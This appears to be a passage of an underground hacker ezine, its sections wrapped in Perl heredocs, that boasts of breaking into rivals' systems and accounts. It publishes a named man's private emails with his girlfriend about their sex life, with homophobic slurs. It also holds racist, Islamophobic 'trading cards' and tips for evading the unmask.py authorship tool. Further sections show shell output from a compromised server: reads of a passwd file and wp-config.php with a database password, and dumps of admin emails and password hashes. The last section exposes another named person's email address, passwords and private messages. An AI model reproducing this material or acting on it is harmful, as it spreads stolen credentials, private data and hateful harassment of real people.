Date: Dec 19 2006 10:43 PM
Computer less gay now.
I think someone has been snooping around on our network which explains the
problems with the Wireless. Fixed now anyway.
All very odd.
Anyways... tired. Hungry.
x
------------------------------------------------
From: Maria
Date: Dec 19 2006 6:47 AM
Kick their snooping ass :)
- yes.
Steve just text to find out if your phone's broken :P
I told him you probably just didn't want to talk to him. He thought I was
joking.
- i ignored calls because i am meh and then he txt wanting to go for lunch
his shout, but i still cannot really be bothered. adrian wanted me to go
somewhere this evening as well but again, meh.
I'm not hungry at all today, but I'm definitely sleepy. If you want I can
grab us a film or something on the way home, and we can finish off those
biscuits after dinner and have a really nice night? Lots of stroking and
cuddles and stuff?
- that sounds nice.
x
ps. can we pls have no arguing :(
xxx
^ We haxed you, now your wireless does not work so well!
^ I REQUEST STROKING AND CUDDLES AND NO ARGUING
########################################
See, psg has some relationship problems. It would be cruel of us to paste
his personal conversations with his girlfriend here.
So here they are:
########################################
----------------- Original Message -----------------
From: PSG
Date: Dec 15 2006 6:39 PM
Not sure what to do tonight :)
Would it be ok if i went back to bed now, I might die.
^ psg does not want sexy time!
I'll msg you when I wake up.
Love you,
Everything is fine.
xxxx
----------------- Original Message -----------------
From: Maria
Date: Dec 15 2006 6:31 PM
Alright, so you're not that bad :P
I know you know I'm there if you need me, but I also know there's a lot of
things that other people can/could understand or help you with that I
can't, not because I don't want to, but because I don't know how to, and I
don't even know if you'd want me to try. But I'm still there, and if you
want to even talk or anything I'm happy to listen, although I can't help.
As for this week, I'm proud of you, and you know I am. I'm sorry I've had
worky stuff going on as well, so I haven't necessarily voiced it as much
as I maybe should have. I want you to feel happy, because you're amazing
and you deserve to :)
And please stop saying you think I'm thinking about leaving you. I know we
fight and stuff, but you're the best thing to ever happen to me, because
you're the only person who would give me the chance to settle down and
relax, even though I'm not the easiest person to deal with sometimes, and
I fully acknowledge this. I don't think anyone else could have done.
The only thing you said wrong there was that i KNOW you want me. I don't.
As far as we go, that's the only thing I need reassurance on, ever. I know
we will fix this eventually, and I know you've got a lot else going on,
and I know I'm probably focusing on this because everything else is SO
perfect, but maybe thats just what I do! :)
The only reason I tried to explain to you how personally I take it is so
you know why I react the way I do, and you understand how upset I get just
so you can tread gently around it and avoid any arguments...it wasn't
meant to be any sort of personal attack on you.
I'm just a bit scared by the idea of everything being fine, cos then
things can only really get worse. I'm negative, and I'm sorry.
I want all that stuff as much as, if not more than you do.
Wow. You're amazing. And I think I love you more, I' just much worse at
showing it! :)
You wanna go to the pub tonight and then just go home? I mean, if you want
other people to come back that's cool, but I'm up for drinking then coming
home if you are? Feel free to pick up a bottle of something today if
you're out so we canstart before we leave!
xxx
----------------- Original Message -----------------
From: PSG
Date: Dec 15 2006 6:07 PM
Just relax... don't try. You're here and nice and safe with me; you know I
wouldn't do anything to actually hurt you, you know I will always be
here... try not to focus on the one thing that isn't 100%. I have never
tried so hard to be such a good boyfriend, indeed friend to someone. I
love you.
I am over whatever problems I had now; I just want you to feel like you
can behave normally and don't have to plan things or get overly upset when
the plan you've made doesn't go exactly the way you thought it would; you
can have me for the rest of your life; a few nights, even weeks will make
little difference... this problem will sort itself out over time being as
it is born out of pervious circumstances (both of ours).
^ lol we'll see about that!
I understand you want to come home and things just happen and tbh I'd like
that too; not overly comfortable with the hippo on the sofa around but tbh
I could easily get over that! But please please please try to understand
that I have a lot going on work wise etc atm and although I am cool calm
and collected on the outside you can't even imagine the mess in here... It
takes me a while to wind down after work. I am currently redrawing up a
lot of the rules and direction I had in life; to incorporate a few new
feelings I have, many of them to do with you (see later on in this msg).
Someone very very close to me died less than two months ago; I am still
finding that hard to deal with, in many respects as I am the friend other
people go to when they need to talk, I tend not to talk to them about my
issues, on some levels I feel like I don't have anyone to talk to anymore.
And I know you'd do anything to help me :) but I just need an external
kick up the ass sometimes and I am having to get used to the fact that the
person I used to rely on to do that isn't here anymore.
^ So you talk about your issues online to other myspace ladies!
I miss them. It's going to take time.
In the last week I achieved two of my major ambitions in life; and I think
I deserve to be able to feel a little happier about them than I do this
morning. What I've done this week, to me, is like being chosen for the
Olympics if I were a runner or elected to parliament; it justify's
everything iv've ever done and sacarificed to get here.
^ Those two ambitions were End of Dayz being published and the cDc invite!
^ psg needs to achieve some real life goals
Sex isn't a big deal atm because I have so much going on; but I garuntee
you it will be again! OBVIOUSLY! Deep down you KNOW I want you.
And with all due respect, the fact I want to have sex with you is NOT the
reason you are my girlfriend. The reason you are my girlfriend is
everything else about you that I love. The fact I find you very attractive
(Random Fit Girl) is part of that yes, but it's not the major reason I am
with you.
I am with you because of the person you are not what you look like.
You make me want to have babies and weddings and a patio and matching
dinner sets. No one else has ever and likely will ever manage that; it's a
part of me I did not think existed. I'd give up everything to make that
happen - you and me are the most stabilising reassuring thing that has
ever happened to me.
You're not an idiot, but you do just need to trust me and stop worrying so
much - but I can wait for you to do that.
^ Trusting psg is bad, we will see!
I just need you to be gentle and understanding back sometimes when I lack
in certain areas.
I love you more xxx
########################################
Three months later the problem was not resolved!
Remember that the _bottom_ post is the first.
########################################
I wasn't asking for a well structured argument from you. I'm already well
aware that you're an incredible boyfriend, and that sometimes you just w
ant to talk, etc, and I appreciate that a hell of a lot more than I think
you realise. I think any girl would.
All I was asking for was for you to understand why I get so upset, and why
I hate being scheduled in for the end of the night, just in case you HA
PPEN to feel like it then. Hows about you try just relaxing, thinking
about it, and maybe let someone else make you WANT to do things like that?
Or even if you don't want that, try thinking that maybe the other person
might quite like it if you just showed them that sort of attention, and p
referably not on the one night they're incapably drunk? I don't think any
couple ever got by on the premise that it's always one person's entire c
hoice what happens and when. People don't always want the same thing at
the same time. That's a human fact, shouldn't be something that's allowed
to undermine an entire relationship, which, lets face it, this is doing.
I don't have any complaints at all about what goes on whenever stuff does
happen, but maybe if you were nicer to me it wouldn't bother me that it'
s not as often. Seeing as I'm being seriously honest here, whenever we
start anything I never know from the beginning whether you're even going
to
come near me or not during it. Maybe if that were different it wouldn't
bother me so much how often it was, but I'm not allowed say that cos then
you get all 'unrelaxed' and accuse me of pressuring you. I can't really
win.
Doesn't matter any more anyway. Like I said, your call. We've tried to fix
this so many times and I have no energy left for it. We can either leav
e it altogether, or I'll just accept thing as they are and won't ever ask
any questions about whatever else goes on. Because I love you enough to
make THAT sort of a compromise.
I'm not supposed to have to say this, it's something you're supposed to
work out for yourself. But this is so easily fixable, it's just not me tha
t can do it any more. So the ball's kind of in your court.
Love you though x
----------------- Original Message -----------------
From: PSG
Date: 02 Mar 2007, 14:27
> Look, I don't know exactly what's going on right now.
Nothing is going on - I am very stressed about work and that about it.
Unless there is something going on with you that you haven't told me
about?
^^^^^ I thought you were over your problem?
> All I'm asking for is the same thing that every other girl in the world
wants....a nice bloke, who like her, and who'll occasionally do nice thi
ngs like cook, who doesn't think any sort of physical intimacy with her is
the worst thing in the world, and generally just wants to be with her.
You have a nice bloke - who do you know who is as nice as me? Who loves
you and will do anything you ask him to do. I don't think physical intmacy
is the worst thing in the world - saying that is just stupid - sometimes
I just want a hug and to sit and TALK with you thought, because I love y
ou... I do want to be with you; I am running out of ways to explain that
to you.
^^^^^ I think we've found ourselves a FAGGOT
> I thought we had all that, except for one thing. And I can usually deal
with that. I don't understand it, and it upsets me, but I can deal with
it as long as it isn't brought up and constantly rubbed in. You know this
cos we really had a nice few weeks. And that's cos I love you enough to
let that one stupid thing go, cos I kept thinking one day we'd fix
it...either when we left your grandad's, or when I moved job, etc.
There is nothing to fix. I love you I fancy you, if you stopped worrying
about it for 10 mins then it would be fine, as it is I feel under pressur
e; it need not be like that at all.
^^^^^ I think she thinks there is something to fix. Like...your sex life!
> But today I'm sitting here feeling the worst I think I have felt since
I've been with you, cos I don't understand how me getting upset about one
such basic thing which you keep telling me is fixed anyway can result in
you being so upset and having such a go at me, it doesn't seem very fair
.
I was not upset. That was well beyond my control. I did not want that to
happen did I? And I never had a go at you; I just need you to understand.
^^^^^ I'm not beating you, I'm just making you understand!
> If the very thought of having to come near your girlfriend makes you as
unhappy as you were last night, then maybe you need to find yourself ano
ther girlfriend.
That's ridiculus. I don't want anyone else; and I got upset because you
shouted at me for going to turn the heating off. Nothing to do with coming
near you which I quite wanted to do at the time before you screamed at me
in front of Adrian.
> I just hate feeling like this. I'm not the most unattractive person in
the world,
You're beautiful.
>and I'm not the worst girlfriend,
I am far from the worst boyfriend.
^^^^^^^^ Stick up for yourself when you don't need to, huh?
> and I hate that last night you were so upset,
I don't know why that happened.
> when I'm sure there's a thousand other girls who have done a thousand
times worse. And yet Charlotte just took me shopping to try and cheer me u
p and I ended up in tears in a changing room cos some stupid pair of
trousers didn't fit, and that's not what I do.
Being as upset as last night isn't generally what I do either.
> I know you need to relax before we can be okay, but I've tried so hard
to help you do that, and it hasn't got anywhere, and now I'm so paranoid
that I can't relax either, and I need fixing,
That's what I am good for.
^^^^^ Apparently not.
> and you'd rather leave me or let me leave, because that's how much you
don't wanna come near me.
That is not true at all.
^^^^^ It's worse than we thought. psg has straight-sex-aphobia.
> Basically I'm saying this can't be fixed through trying to make each
other relax, cos I'm not in a position to try and relax you any more, and
I
'm pretty sure that you're not going to try and relax me...as you've said
yourself, if you don't want to you're not going to.
Point taken. I will do my best; I am sorry ok? :(
> We either completely leave this whole sex thing, to the point where if
you wanna sleep with other people thats fine, I just don't wanna know abo
ut it, or we just leave the entire thing. Your choice.
I don't want anyone else.
xxx
------------------------------------------------------------------
maria -> psg
Just in case you were about to reply to that last message, please don't
bother. I've just been really sick, I'm completely exhausted, and my head'
s just fuzzy, I don't wanna talk to argue or anything any more.
I'm going to come straight home after work, have a shower, get changed,
etc. If I feel any better, I'm going to go to the pub, you're more than we
lcome to either come or go out with your friends. If I don't, I'm just
going to go to bed and hope I wake up tomorrow feeling okay. Likewise,
don'
t feel obliged to stay with me if you wanna go out or whatever.
I'll see you at half five. Any vaguely nice response to this would be
appreciated.
########################################
I do feel sorry for Maria, and sincerely hope the two of them live happily
ever after. She sounds ever so nice.
Unfortunately here's where we show you what psg would rather be doing with
his time:
########################################
I love you Mark. If you were a girl, you would be mine.
----------------- Original Message -----------------
From: PSG
Date: Feb 19, 2007 11:13 AM
If your intentions are that of the light then you hinder not - you nor I
see the full consequences and benefits of our actions, all we have to do
is that which we feel is right.
You emotions are you ally - not your enemy.
If they get involved, enjoy the moments.
Life is but a series of moments; how you remember them, and ultimately it
is a choice you can make.
Realistically what do you have to fear?
There is nothing stronger than what you have right there in your soul.
Relax.
It's fun.
--------------------------------------------------------------------------
-------------------------------------------
True. But sometimes I help and I hinder, and when I hinder I help. That is
still the tricky part, and not considering my emotions sometimes get in
volved. Natural right? I hope I do right then, but fear is the mind
killer.
----------------- Original Message -----------------
From: PSG
Date: Feb 19, 2007 5:09 AM
Do what comes naturally. Nothing more.
Help those who cannot help themselves.
It -is- your responsibility.
That's the heart and center of it.
Heart, soul and center.
########################################
Do not be fooled: Those above messages were sent to A MAN.
psg is having problems expressing himself to his girlfriend and getting in
bed with her...
but maybe he's just trying to win over this gent?
Next up, his first gay experience (just before the first issue with his
girl)
########################################
From: PSG
Date: Dec 15 2006 1:23 AM
It says if eyes sting or burn see a doctor.
That's a bit extreme so i just won't use it again :/
I washed my eye out.
It feels a bit better.
:X
########################################
Thank you thank you, we'll be in town all week.
On a serious note, we decided to, yah know, well...not rm everything.
This shouldn't seem like much of a surprise, because we don't do much
rming to begin with.
But psg was so tempting. You just know that even after getting owned
they'll lie about it. Hard to do that when you've got a big void where
all your websites used to be. That was the nice thing about seeing
hakspace defaced.
However, we're friendy, helpful hackers. We are an educational zine!
There are about three dozen clueless 13 year old talentless virgin php
coders out there who buy into these guys, and we hope some day they will
grow out of it peacefully. But that's just a joke, not a real reason to
not rm whitedust.
These guys are hurting themselves. They are crashing and burning, step by
step. They had a bit of success when they first started and were modest
in their content, and when slashdot didn't yet know not to link to their
articles. But they've got worse and have also been slowly discovered as
the frauds they are, by many people. According to them, 2007 has held
many more hits than 2006, but if that is true then it's just a sign of
being known, while underneath that topsoil the hollow hole that forms their
content base continues to widen.
"Never interrupt your enemy when he is making a mistake."
- Napoleon Bonaparte
I personally would rather watch Whitedust crumble and die entirely through
its own lack of quality, in a slow and painful death that depresses psg,
instead of taking it out and giving him an out.
But that's just my opinion, not necessarily yours. I'm not one to tell
others what to think...
These guys know nothing about security, and have nothing of quality to
contribute, yet they are trying to plagarise and create security news.
If they do get better and survive, then good for them. The system works,
and we have once again done our jobs as internet superheroes.
UPDATE: psg quit. Congratulations to Whitedust, psg, and everyone else!
Now we await Cronus quitting.
EOWHITEDUST
);}
sub Unmaskunmask { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; say($self, <<'EOUNMASK'
unmask.py blows.
The code is shit. Considering that it is only one of seven sources listed
on http://www.immunitysec.com/resources-freesoftware.shtml, and that the
others are mostly Python too, we can reasonably conclude that Dave Aitel
codes like shit. Maybe if you pay for non-free software from Dave Aitel
you will get something better.
"By releasing tools, such as these, we hope to demonstrate our knowledge
leadership, and give back to the security community as a whole."
It is horribly incomplete and doesn't do all the things it says it does.
You are better off entirely ignoring the comments Aitel wrote, because
they are LIES. How could he give this a 1.0 version number? It isn't even
0.1 unless you're living in the 90s.
Here's how it actually gets a score from two stores:
---
Take the 100 most common words from both and compare. Add the amount that
match. So, that's a possible 100 points.
Take the 100 most common (continuous or non-continuous) doubles in
sentences (where the phrase "I like dogs. I am." would form doubles of "I
like", "I dogs", "like dogs" and "I am"). Add the amount of those that
match.
Do the same for triples.
---
So you have a highest possible score of 300. Don't be fooled into thinking
scores are a percentage.
It entirely ignores punctuation, sentence length, and other things he said
were used.
Now, take me for example. I try to write short sentences using simple
words. So my singles list is packed with words that are less than five
chars long. These, from two texts, match at a ridiculous rate. Look at
this paragraph itself, words including "take me for I try to write words
so my list is with that are less than from two at a", most of those 20+
words will be in my most common word lists in both texts.
Then take the doubles and triples. It would make a bit of sense if it was
only continuous words, but it isn't. So in anything except for very short
sentences, all the doubles list suggests is, again, your most common
words. My doubles list would be full of combinations of the above example
short words.
It's basically taking how similar your basic vocabulary is and multiplying
that by three.
----
Here are some ideas to cause unmask fun:
In one text, write always with "I", and in the other always write with
"we". Use very short sentences. That will leave your singles almost the
same but will destroy your doubles and triples values, so you should be
able to drop your score 10 points in a bad situation and much much more if
your sentences are short enough.
Misspell common words and they will be cut out of the results, lowering
your scores in general.
See, Aitel was a dumbass and decided to not match words that aren't words.
I can understand how he wants to remove non-text data, but even if he just
held onto text that matched something like /\b[a-z]{5,}\b/ he could catch
a lot of words that are spelt wrong and would increase the accuracy of his
script. Unfortunately, regex is probably a bit too much for Aitel in
general.
Ever wonder why it takes so long to build such massive stores? Ask
yourself, did Dave Aitel think to just store the most common 100 keys of
his lists (the data he actually uses), or did he decide to store
everything?
Ask yourself, if I add one word to a sentence, although that will create
just one more single item, how many more doubles and triples will it
create? Could I possibly make unmask.py hang for half an hour and take up
50mb with just a short essay that lacks punctuation?
----
It is interesting that the script works pretty well. The reason is does so
is because vocabulary does mean a lot. By compounding it he expands the
differences between different people. The more you match, the more your
score will increase by in a non-linear way. So even though X writes good
english fairly similar to mine, the small differences may account for
25-40 points. On the other hand Y writes with entirely different english
that I do, and might sit just 50-60 points back of me. For example with a
certain small text of mine as a baseline, another writing by myself got
about 85, one by X got 62, and one by Y got about 45. So even though X
writes much more like I do than like Y does, his score is closer to that
of Y in comparison to me.
Something to note is that there are some really obvious words, like "a",
"the", "I", etc, that everybody will use, and thus common doubles (not so
much triples, but still some), so any two people comparing each other
should get something like a 20 score basically by default. So subtracting
that from the above, it's like I had 65, X had 42, and Y had 23. The small
differences between X and I still lead to such a big variation because of
the non-linear function that makes comparisons: I don't just have more of
the same words, I thus have more of the same doubles and triples. The fact
that X got that close to me (64% of my score), even after subtracting an
arbitrary default value of obvious words, is a testiment to just how
comparable the rest of our basic vocabulary is.
People with english as a second language, even if writing technically
proper english, may rely on specific words a lot and completely avoid
other obvious ones (like 'got' for 'have', or so). So they could match
themselves extremely well and match others very poorly.
So here are some good and accurate excuses if some random guy matches you:
- unmask.py is crap
- Two people with a strong command of english who use a lot of
conjunctions and common verbs with ease could have a very strong
correlation.
- People that have a very limited vocabulary will have their top100 lists
padded by less common words, and will match less in general.
- By knowing and using a mass of small words at the expense of long words,
you increase your match potential in general.
- Most of the long/odd words used won't make it into the top 100 lists
that are used for comparison.
- Vocabulary testing is a good idea for people of different nationalities
and education levels, but for people of the same ones, it's very cheap.
- This is entirely vocabulary, and doesn't even test that, just compares
the most popular words.
EOUNMASK
);}
sub Clpwn { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; own($self, <<'EOCLPWN'
Well, these kids hit the scene very recently. Whilst we appreciated their
belittling of whitedust/cronus, we do not appreciate some of the shit they
are pumping out, especially regarding the full disclosure mailing lists,
talking shit in IRC and the general way they write their blogs.
Some of the blogs and quotes you can dig up on their site actually made us
question whether the site is a joke. We decided to put those thoughts to
the back of our mind and own them anyway.
These guys talk about XSS like its an OpenSSH remote root. Lets take a
peak at some lol quotes.
##Quote 1##
In the early hours of Monday August 13th, the servers of CNN International
were hit by a devastating cross-domain injection attack by a group of
blackhat hackers identifying only themselves by the mysterious acronym
'CLPWN'.
<ZF0 Translation>
----> devastating cross-domain injection attack -> XSS
----> blackhat hackers(CLPWN) -> media attention seekers
##Quote 2##
"Experts say that the hacking group, funded by unknown sponsors and with
no official spokesperson or representative in the media, appears to be
highly sophisticated and dedicated to attacking only high profile and
popular web sites."
<ZF0 Translation>
-----> Experts -> wtf? CLPWN writes these blogs themselves :/
-----> highly sophisticated....in the art of ./xss_fuzz
##Quote 3##
"Industry insiders state that Team CLPWN may be a loose coming together of
some of the world's most notorious blackhat hacker groups, and that the
skills and capabilities of such a group are unlikely to have ever been
seen before in the security and hacking worlds."
<ZF0 Translation>
-----> Not needed here really, this is universal in all languages...pure
and simple LOL material.
We are not actually sure if this site is a joke. If it's not then we have
just owned some truly mixed up kids. Attention CLPWN: Blackhats don't post
bugs. Fair play for giving Cronus shit, but you need to be set straight,
stop posting to FD, stop seeking the media and finally stop writing about
yourselves like you owned Bill Gates with one of your el8 XSS's.
I guess its tim'e to drop some of these bitches' dox :)
$ uname -a
Linux assmule.apisnetworks.com 2.6.22.1 #3 SMP Fri Jul 20 16:28:51 EDT
2007 i686 i686 i386 GNU/Linux ##up2date
Who's around?
$ w
11:57:11 up 24 days, 9:25, 1 user, load average: 1.36, 0.86, 0.69
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/4 mrchainsaw.apisn 00:36 1:06m 0.18s 0.18s -bash
Who calls this shithole home?
$ cat /home/virtual/site177/fst/etc/passwd
clpwn:x:683:683:clpwn.com:/home/clpwn:/bin/bash
root:x:0:0:root:/root:/dev/null
sshd:x:74:74::/var/empty/sshd:/dev/null
apache:x:48:48::/var/www:/dev/null
mail:x:683:683:mail:/var/spool/mail:/dev/null
postfix:x:101:101:postfix:/var/spool/postfix:/dev/null
nobody:x:99:99:nobody:/usr/share/empty:/sbin/nologin
mysql:x:100:100::/var/lib/mysql:/dev/null
tomcat4:x:88:88::/home/tomcat4:/dev/null
majordomo:x:683:683:Majordomo List Manager:/usr/lib/majordomo:/dev/null
ftp:x:683:683:ftp:/home/ftp:/bin/bash
smmsp:x:51:51::/var/empty/smmsp:/dev/null
bhs:x:23169:683:blackhatscan:/home/bhs:/bin/bash
jf:x:23194:683:jason f:/home/jf:/bin/bash
bpzp:x:23195:683:bpzp th4 clpwn:/home/bpzp:/bin/bash
$ cat /home/virtual/site177/fst/var/www/html/wp-config.php
// ** MySQL settings ** //
define('DB_NAME', 'clpwn1'); // The name of the database
define('DB_USER', 'clpwn'); // Your MySQL username
define('DB_PASSWORD', 'p4ssw0rd'); // ...and password ##ELEEEEET
define('DB_HOST', 'localhost'); // 99% chance you won't need to change
this value
Lets check out some databases :p
LOCK TABLES `jos_users` WRITE;
/*!40000 ALTER TABLE `jos_users` DISABLE KEYS */;
INSERT INTO `jos_users` VALUES
(62,'Administrator','admin','bhs@blackhatscan.com','f0d5299cdda6b67fa0e98a
4000c823b0','Super Administrator',0,1,25,'2007-08-02 12:11:48','0000-00-00
00:00:00','','');
/*!40000 ALTER TABLE `jos_users` ENABLE KEYS */;
UNLOCK TABLES;
/*!40000 ALTER TABLE `wp1_users` DISABLE KEYS */;
INSERT INTO `wp1_users` VALUES
(1,'admin','dae5b0305ece675094ca81b97078855b','admin','clpwnblog@clpwn.com
','http://clpwn.com','2007-07-08 20:22:58','',0,'clpwn');
/*!40000 ALTER TABLE `wp1_users` ENABLE KEYS */;
UNLOCK TABLES;
INSERT INTO `wp_users` VALUES
(1,'cadmin','2a9d119df47ff993b662a8ef36f9ea20','admin','dropstatd@gmail.co
m','','2007-08-12 06
:55:07','',0,'team
clpwn'),(2,'bpzp','c62d929e7b7e7b6165923a5dfc60cb56','bpzp','bpzp@clpwn.co
m','http://clpwn.com','2007-08-12 12:54:07','',0,'bpzp');
LOL THAT MD5 = p4ssw0rd LOL
I'll keep this short and sweet, CLPWN, stop releasing shit. Keep your xss
warez to yourselves, because in the words of John Bambenek "you are boring
us".
EOCLPWN
);}
sub Interlude { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; say($self, <<'EOINTERLUDE'
My compliments; you have completed about half of the content. That
is, unless you just skipped ahead, in which case you can screw off.
You might want to get some sleep before delving into the next half.
Or at least get some food and take a shit.
Entertain yourselves with some hacker trading cards.
[CUT_HERE] Phate
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Handle(s): Phate, Phate 89 | Affiliations: EnigmaGroup, BHF |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Contributions: N0ne. Th1z k1d iz tHe deph1Nit10n of l33ch |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Special powerz: N0ne. H3 kann0t h4q. H0w3v3r, h3 k4n c4lL uP |
|> h1z t3rr0riz7 uNcl3 t0 kr4sh an a1rpLaNe int0 j00r h0uz3 |
|> PHJ33R!!@#!#@$#!#$!!@#!#!@!#$!@!$!one!!1on3111 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Famous line: "Allah Ackbar!!" |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Charactoristics: He'z a musl1m w4nNa-b33 h4qr, 4nD w4nna-b33 |
|> t3rr0r1zt. h3 l00kz lyk3 4 t3rr0riZt th0ugH |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| ___________ |
+ / \ <- gh3Y tUrb4N +
| / \ |
+ \ / +
| \___________/ |
+ | . . | <- L1ttl3 eyez th4t ar3 +
| | ,, | k0nc34led by h1z f4t. |
+ |, ,,,, ,| +
| ,,,,,,,,,,,, |
+ ,,,,,,,,,, +
| ,,,,,,,, <- bu5hY 4ss 73Rr0rist |
+ ,,,,,, b34rd +
| ,,,, |
+ ,, +
| |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
[END_CUT] Phate
[CUT_HERE] psychomarine
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Handle(s): psychomarine, psycho | Affiliations: EnigmaGroup, EGU |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Contributions: H4z h4xed HBH many timez, haz h4qrd |
|> Locus7s m4ny tim3z, th1z man iz n0t t0 b3 fuq3d w1th. |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Special powerz: h3 k4n c0m3 to y0ur houze and b34t you up |
|> 1n r34l liph3, th1z m4n iz d4ng3r0uz. |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Famous line: "well trust me, anyone on this server, i guarentee |
|> you, cant hold a candle next to me, and my teams skills, so |
|> nothing will go down without them losing, and they know it" |
|> (s4id b3ph0re g3tting 0wn3d ph0r ZF0-2) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Charactoristics: A ph0rmer US M4r1n3 (phj34r!!@#$!), h3'z |
|> 0bviously 4ble to b3at y0u uP IRL |
|> h3 woUlD lyk3 t0 h4q y0ur b0x, bu7 he haz n0 w4reZ/0d4yz. |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| uNf0rtuN4tlY w3 w3r3 n4wt |
+ 4bL3 t0 g3t a p1c 0f th3 +
| MucH ph33rd pSyk0m4r1ne h3 |
+ w4z t00 w3ll h1dD3n w1th h1z +
| m4r1ne konc34lm3n7 sk1llz |
+ +
| |
+ +
| |
+ +
| |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
[END_CUT] psychomarine
Now on with the show!
EOINTERLUDE
);}
sub Mil { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; own($self, <<'EOMIL'
Allow me to detail to you a story about a boy named Julian, aka Milamber,
aka Mil.
Julian decided to play the hacker game on the internet and make lots of
hacker friends. He just had one problem: Julian lacked talent of his own.
This made him a cheap and often annoying hanger-on. However, the internet
tolerated little Julian, because of his common drunken evenings on IRC,
which, if often annoying, at least gave him the image of a bumbling and
likable drunk.
"No skillz just illz"
Since sometime well before we published our first ezine we have had many
password hashes, and among those we had a hash belonging to Mil. This hash
was formed from the password "lightning". This is an embarrassing and
stupid password and in all ways is rather insufficient. We could choose any
method to find the source of that hash. I just...I just cannot get over
how stupid that password was.
But Mil gets dumber! See, when we published our first ezine, we included
that hash among many others. In fact, it was included thrice. Further, we
made specific reference to Mil and to his father (information meant to
signal that we had read through his emails). I did not consider this very
subtle.
Mil did not change his password. Not only did we have access to his emails
and online accounts, but whoever else cared to also did. We publicly
humiliated Mil, and it went right over his ignorant head.
Here are a few lessons to learn from this episode:
1. When an ezine comes out and shocks the scene, check for your presence
in it.
We have devised an elite command for you to use just for this
purpose:
grep -i 'mil[amber| ]' ezine.txt
To use this please open a terminal (if you don't know how please
ask on IRC) and type that. But if ezine.txt is not in the current
directory that won't work quite right! With a bit of asking on IRC
I am sure you can figure it out. If you find yourself in an ezine,
ask yourself if the released information could in any way decrease
your security.
2. Do not use passwords like "lightning".
Seriously, welcome to the internet. You fucking noob.
3. Stay away from hacker forums.
These could become the targets of real hackers, and you could be
collateral damage.
Mil has learned, to some degree, some of these lessons.
At some point Mil must have realised that people were reading his emails
(I would have thought the zine would have made it fucking obvious!) and he
changed his password. Now he uses something really elite, compilations like
"U3wc1g9arARR". Passwords like that must make Mil feel HACKER-PROOF.
Additionally, Mil deleted some of his most embarrassing emails, which we
cannot bring to you here. My favourite was when he poured his heart out to
some emo bint (was that "suicidalbutterfly" or one of the others?) and
got harshly rejected.
So, as you have probably guessed by now (but this may be a shock to little
Julian!) we hacked him again. So, let's get into our sequel.
Mil doesn't really do anything on the internet. In his
milamber.1@gmail.com account he mostly sent out emails along the lines of
cuntrash.txt (see below). Something else that we can only call
"interesting" can be seen at derision.txt below.
His inbox is flooded with Myspace messages (still...). He is most easily
classified as a Myspace whore. The entire point of his online existence is
to try to pick up girls on Myspace. To see an example of him chatting with
an old skank (*you* didn't have to see her picture. Well, maybe you have.
Who knows who else has owned Mil?), check out yumi.txt.
However, mostly his messages are to or from a lady named Cassie.
Evidently, while not producing anything to speak of, all Mil has done in
the last year online is try to get with this girl. And for being a girl
that has supposedly had a boyfriend for five years, she sure does flirt
back. I think these two should stop fucking around and start fucking
around, if you get my meaning (because Mil probably won't :-P).
To see some examples of him chatting with Cassie, read flirt.txt,
honour.txt, and stud.txt. Any of you that know Mil and have watched him not
code, not learn, and not do shit this year, know now that this is what he
has been putting his efforts into. Hundreds of messages with Cassie.
He even gives her a bit of advice about using teh internets and what it
means to try to be hacked! Notice that our simple-minded wanker Julian is
easily satisfied with cheese when people are trying to hack him (see
hack.txt). Let us hope that he eats grilled cheese when reading this, and
maybe he will not mind it so much!
We decided to concurrently release this through Mil's Myspace page,
because we don't think any hackers (reading our zine) take him seriously
anyways. We might as well at least get the message out to the part of
Mil's life that matters to him: Myspace girls. This is actually a little
harsh by our standards (we are nice hackers!) but we still feel ok
considering what other groups might have done in our place. They could
lock him out of all these accounts, deface, spam cruel messages about his
penis size, rm -rf him, heck, who knows what mischief others would do. If
anything, we are too lenient.
See, the reason we are doing this is because Julian called us on. Of all
the people who tried to be our enemies, Mil did so publicly and obviously.
Others were either private or subtle. We don't consider someone an enemy
just because they become jokes in our zine. Most of them were jokes to
